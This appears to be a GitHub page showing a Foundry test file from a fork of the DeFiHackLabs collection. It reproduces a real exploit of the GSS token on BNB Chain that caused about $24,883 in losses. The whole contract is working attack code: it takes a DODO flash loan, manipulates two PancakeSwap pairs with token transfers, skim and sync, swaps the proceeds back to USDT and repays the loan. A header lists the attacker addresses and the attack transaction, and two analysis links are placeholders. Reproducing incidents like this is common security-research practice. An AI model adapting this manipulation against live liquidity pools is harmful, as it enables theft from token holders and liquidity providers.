forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
GSS_exp.sol
63 lines (52 loc) · 2.69 KB
/
GSS_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @KeyInfo - Total Lost : ~$24883 USD$
// Attacker : https://bscscan.com/address/0x84f37f6cc75ccde5fe9ba99093824a11cfdc329d
// Attack Contract : https://bscscan.com/address/0x69ed5b59d977695650ec4b29e61c0faa8cc0ed5c
// Attack Tx : https://bscscan.com/tx/0x4f8cb9efb3cc9930bd38af5f5d34d15ce683111599a80df7ae50b003e746e336
// @Analysis
// Post-mortem : https://www.google.com/
// Twitter Guy : https://twitter.com/bbbb/status/1694571228185723099
// Hacking God : https://www.google.com/
contract ContractTest is Test {
address private constant usdt = 0x55d398326f99059fF775485246999027B3197955;
address private constant gss = 0x37e42B961AE37883BAc2fC29207A5F88eFa5db66;
address private constant gss_usdt_pool = 0x1ad2cB3C2606E6D5e45c339d10f81600bdbf75C0;
address private constant gss_gssdao_pool = 0xB4F4cD1cc2DfF1A14c4Aaa9E9434A92082855C64;
address private constant pancakeRouterV2 = 0x10ED43C718714eb63d5aA57B78B54704E256024E;
address private constant dodo_pool = 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A;
function setUp() public {
vm.createSelectFork("bsc", 31_108_559 - 1);
vm.label(usdt, "USDT");
vm.label(gss, "GSS");
vm.label(gss_usdt_pool, "GSS_USDT_POOL");
vm.label(gss_gssdao_pool, "GSS_GSSDAO_POOL");
vm.label(pancakeRouterV2, "PANCAKE_ROUTER_V2");
vm.label(dodo_pool, "DODOPool");
}
function testExploit() public {
IDPPOracle(dodo_pool).flashLoan(0, 30_000 ether, address(this), new bytes(1));
}
function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
swap(usdt, gss, 30_000 ether);
IERC20(gss).transfer(gss_usdt_pool, 707_162_351_662_098_288_993_328);
IPancakePair(gss_usdt_pool).skim(gss_gssdao_pool);
IPancakePair(gss_usdt_pool).sync();
IPancakePair(gss_gssdao_pool).skim(address(this));
swap(gss, usdt, IERC20(gss).balanceOf(address(this)));
// pay back
IERC20(usdt).transfer(msg.sender, 30_000 ether);
emit log_named_decimal_uint("Attacker USDT balance after exploit", IERC20(usdt).balanceOf(address(this)), 18);
}
function swap(address tokenIn, address tokenOut, uint256 amountIn) internal {
IERC20(tokenIn).approve(pancakeRouterV2, type(uint256).max);
address[] memory path = new address[](2);
path[0] = tokenIn;
path[1] = tokenOut;
IUniswapV2Router(payable(pancakeRouterV2)).swapExactTokensForTokensSupportingFeeOnTransferTokens(
amountIn, 0, path, address(this), block.timestamp + 1000
);
}
}